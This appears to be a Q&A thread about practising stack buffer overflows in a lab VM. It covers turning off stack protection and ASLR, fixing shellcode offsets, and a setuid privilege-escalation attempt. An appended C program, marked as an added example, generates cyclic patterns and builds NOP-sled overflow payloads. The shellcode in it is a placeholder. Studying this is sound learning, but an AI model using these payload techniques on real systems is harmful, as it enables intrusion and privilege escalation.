
I am trying to test buffer overflow attacks in virtualbox and have been struggling for the past few weeks due to all the security features of various distros.

I have tried following tutorials online step by step with no luck.

Rather than trying to disable all the security features, I tried getting an old linux distro but most of them don't come with gcc and lack working repositories now.

I even found a youtube video going step-by-step on Ubuntu 10.10 (which I downloaded too), including all the commands to disable the various security features and had no luck. I could get the segmentation fault but not the 'illegal instruction'.

Is there an ancient linux distro I could still download with none of this protection, which comes with gcc (or one of those huge dvd isos with a complete repository) so I can test this out?

NullPointer

1 Answer


You don't need to.

Compiling an executable with the GCC flag -fno-stack-protector and turning off ASLR with sudo sh -c "echo 0 > /proc/sys/kernel/randomize_va_space" disables the two main memory corruption attack mitigations in many Linux distributions. (Both of these protection technologies date back enough years to make finding a copy of an old distro time consuming, save Damn Vulnerable Linux.)

It's possible on certain distributions that you'll have write xor execute memory pages, which is implemented through a number of different packages which you'll have to disable yourself. That considered, if you're not getting a stack smashing warning it's virtually certain that you don't have an executable with W^X memory pages.

This means if you're getting a segmentation fault, you've probably successfully overwritten the stored EIP on the stack and simply have your shellcode offset wrong or you've made an endianness mistake (some illegal multibyte instructions backwards are no longer illegal!). Examine your program in GDB and I think you'll see where you went wrong.

Exploring The Shellcoder's Handbook may be a profitable use of your time.

zetavolt
  • Thanks for the reply. I have tried -fno-stack-protector and turning off ASLR. – NullPointer Sep 08 '12 at 11:51
  • Then you need to turn off W^X pages (Called DEP on windows, for your interest). What OS are you using? – zetavolt Sep 08 '12 at 20:23
  • Thank you for the help. I managed to find Damn Vulnerable Linux, get a buffer overflow to work and get a shell to spawn on it. I am trying to go one step further now and escalate privileges by performing this exploit on a script with the sticky bit permission (like the passwd file). I have had no luck with this. The tutorials online say to run 'chmod u+s rootme' but the program still runs as my user. I have seen DEP in windows but did not know it was the same thing. – NullPointer Sep 12 '12 at 07:41
  • I think you need to read some more before you try to delve deeper into "hacking" – zetavolt Sep 12 '12 at 18:12
  • I just really want to get a proof of concept first. I am in 2 minds about investing more time into it after this because to actually come up with things like this, it seems you really need a deep understanding of how everything works. I have done some reading and apparently chmod u+s works on compiled programs such as my C program but was disabled for shell scripts (which does not affect me here). I would really like to know why the shell I am spawning with the buffer overflow attack is not a root shell. – NullPointer Sep 12 '12 at 23:36
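The answer's debugging advice (a segmentation fault means the saved EIP was probably overwritten, so check the shellcode offset and the byte order in GDB), worked through as an added example that is not part of the original question or answer. It assumes a 32-bit Linux target compiled with -fno-stack-protector, -z execstack and -no-pie, with ASLR turned off as the answer describes; the target function, the EIP value "seen in GDB", the shellcode bytes and the sled address are constructed placeholders, not values from the post:

```c
/*
 * Added example (not from the original post): helper code for the
 * workflow the answer describes on a 32-bit Linux target built with
 *   gcc -m32 -fno-stack-protector -z execstack -no-pie -o vuln vuln.c
 * and ASLR off.  It generates a cyclic pattern to measure the distance
 * from the start of the buffer to the saved return address, turns the
 * EIP value GDB reports at the crash back into that offset, and packs
 * a payload with the return address in little-endian byte order.
 * The EIP value, shellcode bytes and sled address below are assumptions.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Metasploit-style cyclic pattern "Aa0Aa1...Aa9Ab0Ab1...": every 4-byte
 * window is unique for the first 20280 bytes.  Returns bytes written. */
size_t cyclic_pattern(char *out, size_t n)
{
    for (size_t i = 0; i < n; i++) {
        size_t g = i / 3;                 /* index of the 3-char group */
        switch (i % 3) {
        case 0:  out[i] = (char)('A' + (g / 260) % 26); break;
        case 1:  out[i] = (char)('a' + (g / 10) % 26);  break;
        default: out[i] = (char)('0' + g % 10);         break;
        }
    }
    return n;
}

/* Little-endian packing, the order a 32-bit x86 CPU reads a 4-byte value
 * from memory.  Writing the address in printed order (0xbf 0xff 0xf5 0xc0)
 * instead is the endianness mistake the answer mentions. */
void pack_le32(uint32_t v, uint8_t out[4])
{
    out[0] = (uint8_t)(v & 0xff);
    out[1] = (uint8_t)((v >> 8) & 0xff);
    out[2] = (uint8_t)((v >> 16) & 0xff);
    out[3] = (uint8_t)((v >> 24) & 0xff);
}

/* Given the EIP value GDB shows after the crash (e.g. "EIP: 0x63413563"),
 * find which 4 pattern bytes landed in the saved return address.
 * Returns the offset from the start of the buffer, or -1 if not found. */
long pattern_offset(const char *pat, size_t n, uint32_t eip)
{
    uint8_t needle[4];
    pack_le32(eip, needle);               /* EIP was loaded little-endian */
    for (size_t i = 0; i + 4 <= n; i++)
        if (memcmp(pat + i, needle, 4) == 0)
            return (long)i;
    return -1;
}

/* Classic layout: [NOP sled][shellcode] filling exactly eip_offset bytes,
 * followed by ret_copies copies of the little-endian return address.
 * ret_addr should land inside the sled (read a stack address off GDB).
 * Returns the payload length, or 0 if it does not fit. */
size_t build_payload(uint8_t *out, size_t cap, size_t eip_offset,
                     uint32_t ret_addr, const uint8_t *sc, size_t sc_len,
                     size_t ret_copies)
{
    size_t total = eip_offset + 4 * ret_copies;
    if (sc_len > eip_offset || total > cap)
        return 0;
    size_t sled = eip_offset - sc_len;
    memset(out, 0x90, sled);              /* NOP sled */
    memcpy(out + sled, sc, sc_len);       /* shellcode right after it */
    for (size_t i = 0; i < ret_copies; i++)
        pack_le32(ret_addr, out + eip_offset + 4 * i);
    return total;
}

int main(void)
{
    char pat[200];
    cyclic_pattern(pat, sizeof pat);

    /* Assumed: after feeding pat to the target, GDB reported EIP 0x63413563. */
    long off = pattern_offset(pat, sizeof pat, 0x63413563u);
    fprintf(stderr, "saved EIP sits %ld bytes past the buffer start\n", off);
    if (off < 0)
        return 1;

    /* Placeholder shellcode (two int3 breakpoints) and a placeholder sled
     * address; substitute real ones found in GDB on the actual target. */
    const uint8_t sc[] = { 0xcc, 0xcc };
    uint8_t payload[256];
    size_t len = build_payload(payload, sizeof payload, (size_t)off,
                               0xbffff5c0u, sc, sizeof sc, 3);
    fwrite(payload, 1, len, stdout);      /* e.g. ./vuln "$(./gen)" */
    return len == 0;
}
```

The pattern step replaces guessing at the offset: feed the pattern to the target, read EIP at the crash, and pattern_offset tells you exactly how many bytes precede the saved return address, including any alignment padding the compiler inserted. Hitting an int3 inside the sled under GDB is a cheap way to confirm the return address and byte order before swapping in real shellcode.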